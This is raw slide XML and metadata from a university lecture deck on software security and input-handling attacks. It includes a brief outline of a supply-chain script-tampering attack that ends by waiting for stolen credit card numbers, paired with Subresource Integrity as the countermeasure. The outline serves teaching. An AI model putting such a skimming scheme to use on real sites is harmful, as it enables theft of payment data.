              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> files in that bucket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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sit back &amp; wait for any credit card numbers to be reported</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="008000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-285750"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>ountermeasure: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Subresource</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Integrity (SRI)                                                            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTML source of webpage includes a hash of external resource (e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> file) and browser checks the hash after loading it (and before using it)</a:t>
            </a:r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r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" smtClean="0"/>
              <a:t>https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" smtClean="0"/>
              <a:t>www.riskiq.com/blog/category/magecart</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" smtClean="0"/>
              <a:t>https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>://developer.mozilla.org/en-US/docs/Web/Security/Subresource_Integrity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1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websec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0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38489</TotalTime>
  <Words>5817</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Diavoorstelling (4:3)</PresentationFormat>
  <Paragraphs>1213</Paragraphs>
  <Slides>68</Slides>
  <Notes>6</Notes>
  <HiddenSlides>3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68</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="78" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Arial Narrow</vt:lpstr>
      <vt:lpstr>Arial Rounded MT Bold</vt:lpstr>
      <vt:lpstr>Comic Sans MS</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>DejaVu Sans</vt:lpstr>
      <vt:lpstr>Pieces NFI</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>Software Security   More standard  (input) security problems &amp; countermeasures  </vt:lpstr>
      <vt:lpstr>Security problems seen so far</vt:lpstr>
      <vt:lpstr>How would you attack this web site?</vt:lpstr>
      <vt:lpstr>Fun input to try</vt:lpstr>
      <vt:lpstr>Fun files to upload</vt:lpstr>
      <vt:lpstr>Additional input channel?</vt:lpstr>
      <vt:lpstr>How would you attack this web site?</vt:lpstr>
      <vt:lpstr>Example supply chain attacks  </vt:lpstr>
      <vt:lpstr>Supply chain attacks</vt:lpstr>
      <vt:lpstr>Input problems</vt:lpstr>
      <vt:lpstr>General observations on these attacks</vt:lpstr>
      <vt:lpstr>The I/O attacker model (‘hacking’)</vt:lpstr>
      <vt:lpstr>Dangers of </vt:lpstr>
      <vt:lpstr>Abusing bugs or features</vt:lpstr>
      <vt:lpstr>Abusing bugs or features</vt:lpstr>
      <vt:lpstr>How to defend against this? </vt:lpstr>
      <vt:lpstr>More standard attacks &amp;  a few exotic ones</vt:lpstr>
      <vt:lpstr>Standard attacks/security vulnerabilities</vt:lpstr>
      <vt:lpstr>Injection Attacks : no. 1 in Top Ten https://www.owasp.org/index.php/Top_10-2017_A1-Injection</vt:lpstr>
      <vt:lpstr>OWASP Top 10 -  Risk Rating</vt:lpstr>
      <vt:lpstr>LDAP injection</vt:lpstr>
      <vt:lpstr>XPath injection in XML </vt:lpstr>
      <vt:lpstr>More obscure example: SSI Injection</vt:lpstr>
      <vt:lpstr>More exotic ways to get execution in Word files  </vt:lpstr>
      <vt:lpstr>DDE warnings</vt:lpstr>
      <vt:lpstr>Deserialisation attacks</vt:lpstr>
      <vt:lpstr>Deserialisation attacks [for Java]</vt:lpstr>
      <vt:lpstr>How to exploit deserialisation ?  </vt:lpstr>
      <vt:lpstr>How to exploit deserialisation ?  </vt:lpstr>
      <vt:lpstr>Defenses: Input Validation, Sanitisation,  Escaping, Encoding, Filtering ...</vt:lpstr>
      <vt:lpstr>Recall: Defensive techniques  </vt:lpstr>
      <vt:lpstr>Input validation &amp; sanitisation</vt:lpstr>
      <vt:lpstr>How  to validate or sanitise?</vt:lpstr>
      <vt:lpstr>1. Validation techniques</vt:lpstr>
      <vt:lpstr>Black-listing vs white-listing</vt:lpstr>
      <vt:lpstr>Validation patterns</vt:lpstr>
      <vt:lpstr> Typical packet format spec</vt:lpstr>
      <vt:lpstr>Validation patterns can get  COMPLEX            </vt:lpstr>
      <vt:lpstr>What to do with illegal inputs?</vt:lpstr>
      <vt:lpstr>What more to do?</vt:lpstr>
      <vt:lpstr>Beware of confusion</vt:lpstr>
      <vt:lpstr>Canonicalisation</vt:lpstr>
      <vt:lpstr>Canonicalisation</vt:lpstr>
      <vt:lpstr>Example: Complications in input validation for XSS</vt:lpstr>
      <vt:lpstr>Double encoding problems</vt:lpstr>
      <vt:lpstr>Input validation disasters waiting to happen</vt:lpstr>
      <vt:lpstr>Where  to validate or sanitise?</vt:lpstr>
      <vt:lpstr>Client- vs Server-side validation</vt:lpstr>
      <vt:lpstr>Doing validation right: at choke points</vt:lpstr>
      <vt:lpstr>Where to validate / sanitise?</vt:lpstr>
      <vt:lpstr>Where to validate / sanitise?</vt:lpstr>
      <vt:lpstr>Input vs output sanitisation</vt:lpstr>
      <vt:lpstr>Where &amp; how to validate / sanitise?</vt:lpstr>
      <vt:lpstr>chokepoints, again</vt:lpstr>
      <vt:lpstr>History of input  sanitisation in PHP</vt:lpstr>
      <vt:lpstr>Trust-boundaries &amp; chokepoints</vt:lpstr>
      <vt:lpstr>Example: 2nd order SQL injection</vt:lpstr>
      <vt:lpstr>Web Application Firewall (WAF)</vt:lpstr>
      <vt:lpstr>Defences: Reducing expressive power</vt:lpstr>
      <vt:lpstr>Recall: Defensive Techniques</vt:lpstr>
      <vt:lpstr>Recall forwarding flaws</vt:lpstr>
      <vt:lpstr>Prepared statements: the basic idea</vt:lpstr>
      <vt:lpstr>Prepared statements (aka parameterised queries)</vt:lpstr>
      <vt:lpstr>The idea behind parameterised queries</vt:lpstr>
      <vt:lpstr>Similar mechanisms</vt:lpstr>
      <vt:lpstr>Example stored procedures</vt:lpstr>
      <vt:lpstr>Going one step further: Wyvern</vt:lpstr>
      <vt:lpstr>Tackling input language confusion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SoftwareSecurity1</dc:title>
  <dc:creator>Erik Poll</dc:creator>
  <cp:lastModifiedBy>Erik Poll</cp:lastModifiedBy>
  <cp:revision>304</cp:revision>
  <cp:lastPrinted>1601-01-01T00:00:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">1601-01-01T00:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-10-18T09:30:33Z</dcterms:modified>
</cp:coreProperties>
</file>